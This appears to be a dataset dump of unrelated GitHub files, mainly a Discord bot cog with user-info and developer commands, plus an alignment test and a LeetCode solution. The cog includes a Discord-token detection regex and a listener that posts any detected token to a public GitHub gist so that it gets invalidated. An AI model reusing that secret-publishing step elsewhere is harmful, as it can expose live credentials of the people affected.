links\n","repo_name":"yeti-platform/yeti","sub_path":"plugins/analytics/public/urlscanio.py","file_name":"urlscanio.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"} +{"seq_id":"34041019740","text":"import asyncio\nimport base64\nimport contextlib\nimport functools\nimport io\nimport itertools\nimport os\nimport random\nimport re\nimport secrets\nimport textwrap\nimport typing\nimport unicodedata\nfrom difflib import SequenceMatcher, get_close_matches\n\nimport async_tio\nimport discord\nimport emoji\nimport github\nfrom discord import app_commands\nfrom discord.app_commands import Choice\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nfrom jishaku.codeblocks import codeblock_converter\n\nimport utils\nfrom utils import fuzzy\n\n\nclass Info(commands.Cog):\n \"Gives you Information about data you are allowed to access\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n help=\"gives you info about a guild\",\n aliases=[\n \"server_info\",\n \"guild_fetch\",\n \"guild_info\",\n \"fetch_guild\",\n \"guildinfo\",\n ],\n )\n async def serverinfo(self, ctx, *, guild: typing.Optional[discord.Guild] = None):\n guild = guild or ctx.guild\n\n if guild is None:\n await ctx.send(\"Could not find the guild you were looking for.\")\n\n if guild:\n embed = discord.Embed(title=f\"{guild}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n embed.set_thumbnail(url=guild.icon.url if guild.icon else \"https://i.imgur.com/3ZUrjUP.png\")\n\n view = utils.GuildInfoView(ctx, guild)\n\n await ctx.send(\n \"Get More Information for the guild you selected\",\n embed=embed,\n view=view,\n )\n\n @commands.command(\n aliases=[\"user_info\", \"user-info\", \"ui\", \"whois\"],\n brief=\"a command that gives information on users\",\n help=\"this can work with mentions, ids, usernames, and even full names.\",\n )\n async def userinfo(self, ctx, *, user: utils.SuperConverter = commands.Author):\n embed = discord.Embed(title=f\"{user}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n\n embed.set_image(url=user.display_avatar.url)\n\n view = utils.UserInfoSuper(ctx, user)\n\n await ctx.send(\"Please Note this is being upgraded to a cooler version(it is a bit broken right now)\")\n\n await ctx.send(\n \"Pick a way for Mutual Guilds to be sent to you or not if you really don't the mutualguilds\",\n embed=embed,\n view=view,\n )\n\n @app_commands.command(description=\"Get info about a user\", name=\"userinfo\")\n async def userinfo_slash(\n self, interaction: discord.Interaction, user: typing.Optional[typing.Union[discord.Member, discord.User]] = None\n ):\n user = user or interaction.user\n\n if isinstance(user, discord.Member):\n user = await self.bot.try_member(user.guild, user.id)\n\n ctx = await self.bot.get_context(interaction)\n\n embed = discord.Embed(title=f\"{user}\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n\n embed.set_image(url=user.display_avatar.url)\n\n view = utils.UserInfoSuper(ctx, user)\n\n await ctx.send(\n \"Pick a way for Mutual Guilds to be sent to you or not if you really don't the mutualguilds\",\n embed=embed,\n view=view,\n )\n\n @commands.command(brief=\"uploads your emojis into a Senarc Bin link\")\n async def look_at(self, ctx):\n if isinstance(ctx.message.channel, discord.TextChannel):\n message_emojis = \"\"\n for x in ctx.guild.emojis:\n message_emojis = message_emojis + \" \" + str(x) + \"\\n\"\n\n paste = await utils.post(self.bot, message_emojis)\n await ctx.send(paste)\n\n if isinstance(ctx.channel, discord.DMChannel):\n await ctx.send(\"We can't use that in DMS as it takes emoji regex and puts it into a paste.\")\n\n @commands.command(help=\"gives the id of the current guild or DM if you are in one.\")\n async def guild_get(self, ctx):\n if isinstance(ctx.channel, discord.TextChannel):\n await ctx.send(content=ctx.guild.id)\n\n if isinstance(ctx.channel, discord.DMChannel):\n await ctx.send(ctx.channel.id)\n\n @commands.command(brief=\"a command to tell you the channel id\", aliases=[\"GetChannelId\"])\n async def this(self, ctx):\n await ctx.send(ctx.channel.id)\n\n @commands.command(brief=\"Gives you mention info don't abuse(doesn't mention tho)\")\n async def mention(self, ctx, *, user: utils.SuperConverter = commands.Author):\n await ctx.send(\n f\"Discord Mention: {user.mention} \\nRaw Mention: {discord.utils.escape_mentions(user.mention)}\",\n allowed_mentions=discord.AllowedMentions.none(),\n )\n\n @commands.cooldown(1, 30, BucketType.user)\n @commands.command(help=\"fetch invite details\")\n async def fetch_invite(self, ctx, *invites: typing.Union[discord.Invite, str]):\n if invites:\n menu = utils.InviteInfoEmbed(invites, ctx=ctx, delete_after=True)\n await menu.send()\n if not invites:\n await ctx.send(\"Please get actual invites to attempt grab\")\n ctx.command.reset_cooldown(ctx)\n\n if len(invites) > 50:\n await ctx.send(\n \"Reporting using more than 50 invites in this command. This is to prevent ratelimits with the api.\"\n )\n\n jdjg = await self.bot.try_user(168422909482762240)\n await self.bot.support_webhook.send(\n f\"{jdjg.mention}.\\n{ctx.author} causes a ratelimit issue with {len(invites)} invites\"\n )\n\n @commands.command(brief=\"gives info about a file\")\n async def file(self, ctx):\n if not ctx.message.attachments:\n await ctx.send(ctx.message.attachments)\n await ctx.send(\"no file submitted\")\n\n if ctx.message.attachments:\n embed = discord.Embed(title=\"Attachment info\", color=random.randint(0, 16777215))\n for a in ctx.message.attachments:\n embed.add_field(name=f\"ID: {a.id}\", value=f\"[{a.filename}]({a.url})\")\n embed.set_footer(text=\"Check on the url/urls to get a direct download to the url.\")\n await ctx.send(embed=embed, content=\"\\nThat's good\")\n\n @commands.command(\n brief=\"a command to get the avatar of a user\",\n help=\"using the userinfo technology it now powers avatar grabbing.\",\n aliases=[\"pfp\", \"av\"],\n )\n async def avatar(self, ctx, *, user: utils.SuperConverter = commands.Author):\n embed = discord.Embed(color=random.randint(0, 16777215))\n embed.set_author(name=f\"{user.name}'s avatar:\", icon_url=user.display_avatar.url)\n\n embed.set_image(url=user.display_avatar.url)\n embed.set_footer(text=f\"Requested by {ctx.author}\")\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"this is a way to get the nearest channel.\")\n async def find_channel(self, ctx, *, args=None):\n if args is None:\n await ctx.send(\"Please specify a channel\")\n\n if args:\n if isinstance(ctx.channel, discord.TextChannel):\n channel = discord.utils.get(ctx.guild.channels, name=args)\n if channel:\n await ctx.send(channel.mention)\n if channel is None:\n await ctx.send(\"Unforantely we haven't found anything\")\n\n if isinstance(ctx.channel, discord.DMChannel):\n await ctx.send(\"You can't use it in a DM.\")\n\n @commands.command(brief=\"a command to get the closest user.\")\n async def closest_user(self, ctx, *, args=None):\n if args is None:\n return await ctx.send(\"please specify a user\")\n\n if args and not self.bot.users:\n return await ctx.send(\"There are no users cached :(\")\n\n if args:\n userNearest = discord.utils.get(self.bot.users, name=args)\n user_nick = discord.utils.get(self.bot.users, display_name=args)\n\n if userNearest is None:\n userNearest = sorted(self.bot.users, key=lambda x: SequenceMatcher(None, x.name, args).ratio())[-1]\n\n if user_nick is None:\n user_nick = sorted(self.bot.users, key=lambda x: SequenceMatcher(None, x.display_name, args).ratio())[\n -1\n ]\n\n if isinstance(ctx.channel, discord.TextChannel):\n member_list = [x for x in ctx.guild.members if x.nick]\n\n nearest_server_nick = sorted(member_list, key=lambda x: SequenceMatcher(None, x.nick, args).ratio())[-1]\n\n if isinstance(ctx.channel, discord.DMChannel):\n nearest_server_nick = \"You unfortunately don't get the last value(a nickname) as it's a DM.\"\n\n await ctx.send(f\"Username : {userNearest} \\nDisplay name : {user_nick} \\nNickname: {nearest_server_nick}\")\n\n @commands.command(help=\"gives info on default emoji and custom emojis\", name=\"emoji\")\n async def emoji_info(\n self,\n ctx: commands.Context,\n *,\n emojis: typing.Annotated[utils.EmojiConverter.ConvertedEmojis, utils.EmojiConverter],\n ):\n print(emojis, emojis.all, emojis.valid_emojis, emojis.invalid_emojis)\n menu = utils.EmojiInfoEmbed(emojis.all, ctx=ctx, delete_after=True) # type: ignore\n await menu.send()\n\n @commands.command(brief=\"gives info on emoji_id and emoji image.\")\n async def emoji_id(\n self,\n ctx,\n *,\n emoji: typing.Optional[typing.Union[discord.PartialEmoji, discord.Message, utils.EmojiBasic]] = None,\n ):\n if isinstance(emoji, discord.Message):\n emoji_message = emoji.content\n emoji = None\n\n with contextlib.suppress(commands.CommandError, commands.BadArgument):\n emoji = await utils.EmojiBasic.convert(\n ctx, emoji_message\n ) or await commands.PartialEmojiConverter().convert(ctx, emoji_message)\n\n if emoji:\n embed = discord.Embed(description=f\" Emoji ID: {emoji.id}\", color=random.randint(0, 16777215))\n embed.set_image(url=emoji.url)\n await ctx.send(embed=embed)\n\n else:\n await ctx.send(\"Not a valid emoji id.\")\n\n @commands.command()\n async def fetch_content(self, ctx, *, args=None):\n if args is None:\n await ctx.send(\"please send actual text\")\n\n if args:\n args = discord.utils.escape_mentions(args)\n args = discord.utils.escape_markdown(args, as_needed=False, ignore_links=False)\n\n for x in ctx.message.mentions:\n args = args.replace(x.mention, f\"\\{x.mention}\")\n\n emojis = emoji.emoji_lis(args)\n emojis_return = [d[\"emoji\"] for d in emojis]\n\n for x in emojis_return:\n args = args.replace(x, f\"\\{x}\")\n\n for x in re.findall(r\":\\w*:\\d*\", args):\n args = args.replace(x, f\"\\{x}\")\n\n await ctx.send(f\"{args}\", allowed_mentions=discord.AllowedMentions.none())\n\n @commands.command(brief=\"gives info about a role.\", aliases=[\"roleinfo\"])\n async def role_info(self, ctx, *, role: typing.Optional[discord.Role] = None):\n if role:\n await utils.roleinfo(ctx, role)\n # backend and how it works will be updated soon\n\n if not role:\n await ctx.send(f\"The role you wanted was not found.\")\n\n\nclass DevTools(commands.Cog):\n \"Helpful commands for developers in general\"\n\n def __init__(self, bot):\n self.bot = bot\n\n self.TOKEN_RE = re.compile(r\"[a-zA-Z0-9_-]{23,28}\\.[a-zA-Z0-9_-]{6,7}\\.[a-zA-Z0-9_-]{26}\\w{1}\")\n\n self.pool = self.bot.db\n\n async def cog_load(self):\n github_token = os.environ.get(\"github_token\")\n self.github = await github.GHClient(username=\"JDJGBot\", token=github_token)\n self.rtfm_dictionary = sorted(await self.bot.db.fetch(\"SELECT * FROM RTFM_DICTIONARY\"))\n self.tio = async_tio.Tio(session=self.bot.session)\n\n async def cog_unload(self):\n await self.github.close()\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if not message.guild or message.guild.id != 1019027330779332660:\n return\n\n match = self.TOKEN_RE.findall(message.content)\n if match:\n gist = await self.github.create_gist(\n files=[github.File(fp=\"\\n\".join([m for m in match]), filename=\"token.txt\")],\n description=\"Token Detected, invalidated in process\",\n public=True,\n )\n\n await message.channel.send(\n f\"{message.author.mention} Token detected, invalidated in process.\\nGist: <{gist.url}>\"\n )\n\n @commands.command(brief=\"Tells bot if it should invalidate token.\")\n async def token_snipper(self, ctx):\n embed = discord.Embed(\n title=\"Token Snipper Tool\",\n description=\"It tells the bot if it should invalidate any discord tokens sent into chat\",\n color=random.randint(0, 16777215),\n timestamp=ctx.message.created_at,\n )\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.display_avatar.url)\n embed.set_image(url=\"https://i.imgur.com/WPExfNr.gif\")\n embed.set_footer(text=\"This snipper snipes tokens she sees in chat.\")\n\n view = utils.TokenInvalidatorSettings(ctx)\n await ctx.send(\"Please pick the buttons below to pick.\", embed=embed, view=view)\n\n async def rtfm_lookup(self, url=None, *, args=None):\n if not args:\n return url\n\n else:\n unfiltered_results = await utils.rtfm(self.bot, url)\n\n results = fuzzy.finder(args, unfiltered_results, key=lambda t: t[0])\n\n if not results:\n return f\"Could not find anything with {args}.\"\n\n else:\n return results\n\n async def rtfm_send(self, ctx, results):\n if isinstance(results, str):\n await ctx.send(results, allowed_mentions=discord.AllowedMentions.none())\n\n else:\n embed = discord.Embed(color=random.randint(0, 16777215))\n\n results = results[:10]\n\n embed.description = \"\\n\".join(f\"[`{result}`]({result.url})\" for result in results)\n\n reference = utils.reference(ctx.message)\n await ctx.send(embed=embed, reference=reference)\n\n @commands.command(\n aliases=[\"rtd\", \"rtfs\", \"rtdm\"],\n invoke_without_command=True,\n brief=\"a rtfm command that allows you to lookup at any library we support looking up(using selects)\",\n )\n async def rtfm(self, ctx, *, args=None):\n view = utils.RtfmChoice(ctx, self.rtfm_dictionary, timeout=15.0)\n\n await ctx.send(content=\"Please Pick a library you want to parse\", view=view)\n\n await view.wait()\n\n await ctx.typing()\n\n results = await self.rtfm_lookup(url=view.value, args=args)\n\n await self.rtfm_send(ctx, results)\n\n @app_commands.command(description=\"looks up docs\", name=\"rtfm\")\n async def rtfm_slash(\n self, interaction: discord.Interaction, library: str, query: typing.Optional[str] = None\n ) -> None:\n \"\"\"Looks up docs for a library with optionally a query.\"\"\"\n if query is None or query == \"No Results Found\":\n return await interaction.response.send_message(f\"Alright Let's see \\n{library}\")\n\n await interaction.response.send_message(f\"Alright Let's see \\n{library+query}\")\n\n @rtfm_slash.autocomplete(\"library\")\n async def rtfm_library_autocomplete(self, interaction: discord.Interaction, current: str) -> list[Choice]:\n libraries = dict(self.rtfm_dictionary)\n\n all_choices: list[Choice] = [Choice(name=name, value=link) for name, link in libraries.items()]\n startswith: list[Choice] = [choices for choices in all_choices if choices.name.startswith(current)]\n if not (current and startswith):\n return all_choices[0:25]\n\n return startswith\n\n @rtfm_slash.autocomplete(\"query\")\n async def rtfm_query_autocomplete(self, interaction: discord.Interaction, current: str) -> list[Choice]:\n url = interaction.namespace.library or list(dict(self.rtfm_dictionary).values())[0]\n unfiltered_results = await utils.rtfm(self.bot, url)\n\n all_choices = [Choice(name=result.name, value=result.url.replace(url, \"\")) for result in unfiltered_results]\n\n if not current:\n return all_choices[:25]\n\n filtered_results = fuzzy.finder(current, unfiltered_results, key=lambda t: t[0])\n\n results = [Choice(name=result.name, value=result.url.replace(url, \"\")) for result in filtered_results]\n\n return results[0:25]\n\n @rtfm_slash.error\n async def rtfm_error(self, interaction: discord.Interaction, error) -> None:\n await interaction.response.send_message(f\"{error}! Please Send to this to my developer\", ephemeral=True)\n print(error)\n print(interaction.command)\n\n def charinfo_converter(self, string):\n digit = f\"{ord(string):x}\"\n name = unicodedata.name(string, \"The unicode was not found\")\n return f\"`\\\\U{digit:>08}`: {name} - {string} \\N{EM DASH} \"\n\n @commands.command(brief=\"Gives you data about charinfo (based on R.danny's command)\")\n async def charinfo(self, ctx, *, args=None):\n if not args:\n return await ctx.send(\"That doesn't help out all :(\")\n\n values = \"\\n\".join(map(self.charinfo_converter, set(args)))\n\n content = textwrap.wrap(values, width=2000)\n\n menu = utils.charinfoMenu(content, ctx=ctx, delete_after=True)\n\n await menu.send()\n\n @commands.command(brief=\"a command to view the rtfm DB\")\n async def rtfm_view(self, ctx):\n rtfm_dictionary = dict(self.rtfm_dictionary)\n\n pag = commands.Paginator(prefix=\"\", suffix=\"\")\n for g in rtfm_dictionary:\n pag.add_line(f\"{g} : {rtfm_dictionary.get(g)}\")\n\n menu = utils.RtfmEmbed(pag.pages, ctx=ctx, delete_after=True)\n await menu.send()\n\n @commands.command(brief=\"a command to autoformat your python code to pep8\")\n async def pep8(self, ctx):\n modal = utils.CodeBlockView(ctx, timeout=180.0)\n message = await ctx.send(\n \"Please Submit the Code Block\\nDo you want to use black's line formatter at 120 (i.e. black - l120 .), or just use the default? (i.e black .):\",\n view=modal,\n )\n await modal.wait()\n\n if not modal.value:\n return await ctx.reply(\"You need to give it code to work with it.\", mention_author=False)\n\n code = codeblock_converter(argument=f\"{modal.value}\")\n\n if modal.value2 is None or modal.value2 is False:\n await message.edit(content=\"Default it is.\", view=None)\n\n if modal.value2 is True:\n await message.edit(content=\"Speacil Formatting at 120 lines it is.\")\n\n try:\n code = await asyncio.to_thread(utils.formatter, code.content, bool(modal.value2))\n\n except Exception as e:\n return await message.edit(content=f\"Error Ocurred with {e}\")\n\n embed = discord.Embed(\n title=\"Reformatted with Black\",\n description=f\"code returned: \\n```python\\n{code}```\",\n color=random.randint(0, 16777215),\n )\n embed.set_footer(text=\"Make sure you use python code, otherwise it will not work properly.\")\n await message.edit(embed=embed)\n\n @commands.command(brief=\"grabs your pfp's image\")\n async def pfp_grab(self, ctx):\n if_animated = ctx.author.display_avatar.is_animated()\n\n save_type = \".gif\" if if_animated else \".png\"\n\n file = await ctx.author.display_avatar.to_file(filename=f\"pfp{save_type}\")\n try:\n await ctx.send(content=\"here's your avatar:\", file=file)\n\n except:\n await ctx.send(\"it looks like it couldn't send the pfp due to the file size.\")\n\n @commands.command(brief=\"Gives info on pypi packages\")\n async def pypi(self, ctx, *, args=None):\n # https://pypi.org/simple/\n\n if args:\n pypi_response = await self.bot.session.get(f\"https://pypi.org/pypi/{args}/json\")\n if pypi_response.ok:\n pypi_response = await pypi_response.json()\n\n pypi_data = pypi_response[\"info\"]\n\n embed = discord.Embed(\n title=f\"{pypi_data.get('name') or 'None provided'} {pypi_data.get('version') or 'None provided'}\",\n url=f\"{pypi_data.get('release_url') or 'None provided'}\",\n description=f\"{pypi_data.get('summary') or 'None provided'}\",\n color=random.randint(0, 16777215),\n )\n\n embed.set_thumbnail(url=\"https://i.imgur.com/oP0e7jK.png\")\n\n embed.add_field(\n name=\"**Author Info**\",\n value=f\"**Author Name:** {pypi_data.get('author') or 'None provided'}\\n**Author Email:** {pypi_data.get('author_email') or 'None provided'}\",\n inline=False,\n )\n embed.add_field(\n name=\"**Package Info**\",\n value=f\"**Download URL**: {pypi_data.get('download_url') or 'None provided'}\\n**Documentation URL:** {pypi_data.get('docs_url') or 'None provided'}\\n**Home Page:** {pypi_data.get('home_page') or 'None provided'}\\n**Keywords:** {pypi_data.get('keywords') or 'None provided'}\\n**License:** {pypi_data.get('license') or 'None provided'}\",\n inline=False,\n )\n\n await ctx.send(embed=embed)\n\n else:\n await ctx.send(\n f\"Could not find package **{args}** on pypi.\", allowed_mentions=discord.AllowedMentions.none()\n )\n\n else:\n await ctx.send(\"Please look for a library to get the info of.\")\n\n @commands.command(brief=\"make a quick bot invite with 0 perms\")\n async def invite_bot(self, ctx, *, user: typing.Optional[discord.User] = commands.Author):\n if not user.bot:\n return await ctx.send(\"That's not a legit bot\")\n\n invite = discord.utils.oauth_url(client_id=user.id, scopes=(\"bot\",))\n slash_invite = discord.utils.oauth_url(client_id=user.id)\n\n view = discord.ui.View()\n view.add_item(\n discord.ui.Button(label=f\"{user.name}'s Normal Invite\", url=invite, style=discord.ButtonStyle.link)\n )\n view.add_item(\n discord.ui.Button(\n label=f\"{user.name}'s Invite With Slash Commands\", url=slash_invite, style=discord.ButtonStyle.link\n )\n )\n\n await ctx.send(f\"Invite with slash commands and the bot scope or only with a bot scope:\", view=view)\n\n @commands.command(brief=\"some old fooz command..\")\n async def fooz(self, ctx, *, args=None):\n if not args:\n await ctx.send(\"success\")\n\n if args:\n await ctx.send(\"didn't use it properly :(\")\n\n @commands.command(brief=\"puts the message time as a timestamp\")\n async def message_time(self, ctx):\n embed = discord.Embed(title=\"Message Time\", color=random.randint(0, 16777215), timestamp=ctx.message.created_at)\n embed.set_footer(text=f\"{ctx.message.id}\")\n\n await ctx.send(content=f\"Only here cause JDJG Bot has it and why not have it here now.\", embed=embed)\n\n @commands.command(brief=\"converts info about colors for you.\", invoke_without_command=True)\n async def color(self, ctx, *, color: utils.ColorConverter = None):\n if not color:\n return await ctx.send(\"you need to give me a color to use.\")\n\n await ctx.send(f\"Hexadecimal: {color} \\nValue : {color.value} \\nRGB: {color.to_rgb()}\")\n\n @commands.command(brief=\"a command that tells a user creation time.\")\n async def created_at(self, ctx, *, user: utils.SuperConverter = commands.Author):\n creation_info = f\"{discord.utils.format_dt(user.created_at, style = 'd')}\\n{discord.utils.format_dt(user.created_at, style = 'T')}\"\n\n await ctx.send(\n f\"\\nName : {user}\\nMention : {user.mention} was created:\\n{creation_info}\\nRaw Version: ```{creation_info}```\",\n allowed_mentions=discord.AllowedMentions.none(),\n )\n\n @commands.command(brief=\"a command that makes a fake user id based on the current time.\")\n async def fake_user_id(self, ctx):\n await ctx.send(f\"User id: {utils.generate_snowflake()}\")\n\n @commands.command(brief=\"gives information on snowflakes\")\n async def snowflake_info(self, ctx, *, snowflake: typing.Optional[utils.ObjectPlus] = None):\n if not snowflake:\n await ctx.send(\n \"you either returned nothing or an invalid snowflake now going to the current time for information.\"\n )\n\n # change objectplus convert back to the before(discord.Object), same thing with utls.ObjectPlus, if edpy adds my pull request into the master.\n\n generated_time = await utils.ObjectPlusConverter().convert(ctx, argument=f\"{int(utils.generate_snowflake())}\")\n\n snowflake = snowflake or generated_time\n\n embed = discord.Embed(title=\"❄️ SnowFlake Info:\", color=5793266)\n\n embed.add_field(\n name=\"Created At:\",\n value=f\"{discord.utils.format_dt(snowflake.created_at, style = 'd')}\\n{discord.utils.format_dt(snowflake.created_at, style = 'T')}\",\n )\n\n embed.add_field(name=\"Worker ID:\", value=f\"{snowflake.worker_id}\")\n\n embed.add_field(name=\"Process ID:\", value=f\"{snowflake.process_id}\")\n\n embed.add_field(name=\"Increment:\", value=f\"{snowflake.increment_id}\")\n\n embed.set_footer(text=f\"Snowflake ID: {snowflake.id}\")\n\n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Generates a fake token from the current time\")\n async def fake_token(self, ctx):\n object = discord.Object(utils.generate_snowflake())\n\n first_encoded = base64.b64encode(f\"{object.id}\".encode())\n first_bit = first_encoded.decode().rstrip(\"=\")\n\n timestamp = int(object.created_at.timestamp() - 129384000)\n d = timestamp.to_bytes(4, \"big\")\n second_bit_encoded = base64.standard_b64encode(d)\n second_bit = second_bit_encoded.decode().rstrip(\"=\")\n\n last_bit = secrets.token_urlsafe(20)\n\n embed = discord.Embed(\n title=f\"Newly Generated Fake Token\",\n description=f\"ID: ``{object.id}``\\nCreated at : \\n{discord.utils.format_dt(object.created_at, style = 'd')}\\n{discord.utils.format_dt(object.created_at, style = 'T')}\",\n )\n embed.add_field(name=\"Generated Token:\", value=f\"``{first_bit}.{second_bit}.{last_bit}``\")\n embed.set_thumbnail(url=ctx.author.display_avatar.url)\n embed.set_footer(text=f\"Requested by {ctx.author}\")\n\n await ctx.send(\"We generated a fake token :clap::\", embed=embed)\n\n @commands.cooldown(1, 60, BucketType.user)\n @commands.command(brief=\"makes a request to add a bot to the test guild\")\n async def addbot(self, ctx, *, user: typing.Optional[discord.User] = commands.Author):\n if not user.bot:\n ctx.command.reset_cooldown(ctx)\n return await ctx.send(\"Please Use A **Bot** ID, not a **User** ID.\")\n\n modal = utils.AddBotView(ctx, timeout=180.0)\n message = await ctx.send(\"Please Tell us the reason you want to add your bot to the Test Guild:\", view=modal)\n await modal.wait()\n\n if modal.value is None:\n ctx.command.reset_cooldown(ctx)\n return await message.edit(content=\"Provide a reason why you want your bot added to your guild\")\n\n guild = self.bot.get_guild(438848185008390158)\n member = await self.bot.try_member(guild, ctx.author.id)\n if member is None:\n view = discord.ui.View()\n view.add_item(\n discord.ui.Button(\n label=f\"Test Guild Invite\",\n url=\"https://discord.gg/hKn8qgCDzK\",\n style=discord.ButtonStyle.link,\n row=1,\n )\n )\n return await message.edit(\n content=\"Make sure to join the guild linked soon... then rerun the command. If you are in the guild contact the owner(the owner is listed in the owner command)\",\n view=view,\n )\n\n embed = discord.Embed(\n title=\"Bot Request\",\n colour=discord.Colour.blurple(),\n description=f\"reason: \\n{modal.value}\\n\\n[Invite URL]({discord.utils.oauth_url(client_id = user.id, scopes=('bot',))})\",\n timestamp=ctx.message.created_at,\n )\n\n embed.add_field(name=\"Author\", value=f\"{ctx.author} (ID: {ctx.author.id})\", inline=False)\n embed.add_field(name=\"Bot\", value=f\"{user} (ID: {user.id})\", inline=False)\n\n embed.set_footer(text=ctx.author.id)\n embed.set_author(name=user.id, icon_url=user.display_avatar.with_format(\"png\"))\n\n jdjg = self.bot.get_user(168422909482762240)\n benitz = self.bot.get_user(529499034495483926)\n\n await self.bot.get_channel(852897595869233182).send(content=f\"{jdjg.mention} {benitz.mention}\", embed=embed)\n # placeholder\n\n await ctx.reply(\n f\"It appears adding your bot worked. \\nIf you leave your bot will be kicked, unless you have an alt there, a friend, etc. \\n(It will be kicked to prevent raiding and taking up guild space if you leave). \\nYour bot will be checked out. {jdjg} will then determine if your bot is good to add to the guild. Make sure to open your Dms to JDJG, so he can dm you about the bot being added. \\nIf you don't add him, your bot will be denied.\"\n )\n\n @commands.command(\n brief=\"a command that takes a url and sees if it's an image (requires embed permissions at the moment).\"\n )\n async def image_check(self, ctx):\n await ctx.send(\n \"Please wait for discord to edit your message, if it does error about not a valid image, please send a screenshot of your usage and the bot's message.\"\n )\n await asyncio.sleep(5)\n\n images = list(filter(lambda e: e.type == \"image\", ctx.message.embeds))\n\n if not images or not ctx.message.embeds:\n return await ctx.send(\n \"you need to pass a url with an image, if you did, then please run again. This is a discord issue, and I do not want to wait for discord to change its message.\"\n )\n\n await ctx.send(f\"You have {len(images)} / {len(ctx.message.embeds)} links that are valid images.\")\n\n @commands.command(brief=\"Gives info on npm packages\")\n async def npm(self, ctx, *, args=None):\n if args:\n npm_response = await self.bot.session.get(f\"https://registry.npmjs.com/{args}\")\n\n if npm_response.ok:\n npm_response = await npm_response.json()\n\n data = utils.get_required_npm(npm_response)\n await ctx.send(embed=utils.npm_create_embed(data))\n\n else:\n await ctx.send(\n f\"Could not find package **{args}** on npm.\", allowed_mentions=discord.AllowedMentions.none()\n )\n\n else:\n await ctx.send(\"Please look for a library to get the info of.\")\n\n @commands.cooldown(1, 30, BucketType.user)\n @commands.command(\n brief=\"runs some code in a sandbox(based on Soos's Run command)\", aliases=[\"eval\", \"run\", \"sandbox\"]\n )\n async def console(self, ctx, *, code: codeblock_converter = None):\n if not code:\n ctx.command.reset_cooldown(ctx)\n return await ctx.send(\"You need to give me some code to use, otherwise I can not determine what it is.\")\n\n if not code.language:\n ctx.command.reset_cooldown(ctx)\n return await ctx.send(\"You Must provide a language to use\")\n\n if not code.content:\n ctx.command.reset_cooldown(ctx)\n return await ctx.send(\"No code provided\")\n\n output = await self.tio.execute(f\"{code.content}\", language=f\"{code.language}\")\n\n text_returned = (\n f\"```{code.language}\\n{output}```\"\n if len(f\"{output}\") < 200\n else await utils.post(self.bot, code=f\"{output}\")\n )\n\n embed = discord.Embed(\n title=f\"Your code exited with code {output.exit_status}\", description=f\"{text_returned}\", color=242424\n )\n\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.display_avatar.url)\n\n embed.set_footer(text=\"Powered by Tio.run\")\n\n await ctx.send(content=\"I executed your code in a sandbox\", embed=embed)\n\n\nasync def setup(bot):\n await bot.add_cog(Info(bot))\n await bot.add_cog(DevTools(bot))\n","repo_name":"JDsProjects/JDBot","sub_path":"cogs/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":32811,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"8519868010","text":"import os\nfrom pathlib import Path\nimport numpy as np\nfrom dtaidistance import alignment\n\n\ndirectory = None\n\n\ndef test_sequences1():\n \"\"\"Example from https://en.wikipedia.org/wiki/Needleman–Wunsch_algorithm. \"\"\"\n s1 = \"GATTACA\"\n s2 = \"GCATGCU\"\n value, matrix = alignment.needleman_wunsch(s1, s2)\n algn, s1a1, s2a1 = alignment.best_alignment(matrix, s1, s2, gap='-')\n matrix_sol = [\n [-0., -1., -2., -3., -4., -5., -6., -7.],\n [-1., 1., -0., -1., -2., -3., -4., -5.],\n [-2., -0., -0., 1., -0., -1., -2., -3.],\n [-3., -1., -1., -0., 2., 1., -0., -1.],\n [-4., -2., -2., -1., 1., 1., -0., -1.],\n [-5., -3., -3., -1., -0., -0., -0., -1.],\n [-6., -4., -2., -2., -1., -1., 1., -0.],\n [-7., -5., -3., -1., -2., -2., -0., -0.]]\n algn_sol1 = [['G', '-', 'A', 'T', 'T', 'A', 'C', 'A'], ['G', 'C', 'A', 'T', '-', 'G', 'C', 'U']]\n assert value == 0.0\n assert np.array_equal(matrix, matrix_sol)\n assert s1a1 == algn_sol1[0]\n assert s2a1 == algn_sol1[1]\n\n\nif __name__ == \"__main__\":\n directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))\n print(f\"Saving files to {directory}\")\n test_sequences1()\n","repo_name":"voskresenskiianton/time-series-clustering","sub_path":"dtaidistance-master/tests/test_alignment.py","file_name":"test_alignment.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"70370081653","text":"from binarytree import *\r\np=Node(3)\r\np.left=Node(9)\r\np.right=Node(20)\r\np.right.left=Node(15)\r\np.right.right=Node(7)\r\n# p.right.left=Node(4)\r\nprint(p)\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\nclass Solution:\r\n def zigzagLevelOrder(self, root: TreeNode) :\r\n if root is None:\r\n return []\r\n res=[]\r\n i=0\r\n queue=[root]\r\n while(queue):\r\n tmp=[]\r\n ret=([node.val for node in queue])#####ret只存每一层的val\r\n for node in queue:\r\n if node.left:\r\n tmp.append(node.left)\r\n if node.right:\r\n tmp.append(node.right)\r\n queue=tmp\r\n if (i%2)==0:\r\n res.append(ret)\r\n else:\r\n res.append(ret[::-1])\r\n i+=1\r\n return res\r\na=Solution()\r\nprint(a.zigzagLevelOrder(p))","repo_name":"gouwei222/leetcode-python3","sub_path":"leetcode103.py","file_name":"leetcode103.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37122853217","text":"# Django Imports\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework.renderers import JSONRenderer, TemplateHTMLRenderer\n\n# Local Imports\nfrom Tasks.models import Task\nfrom Tasks.serializers 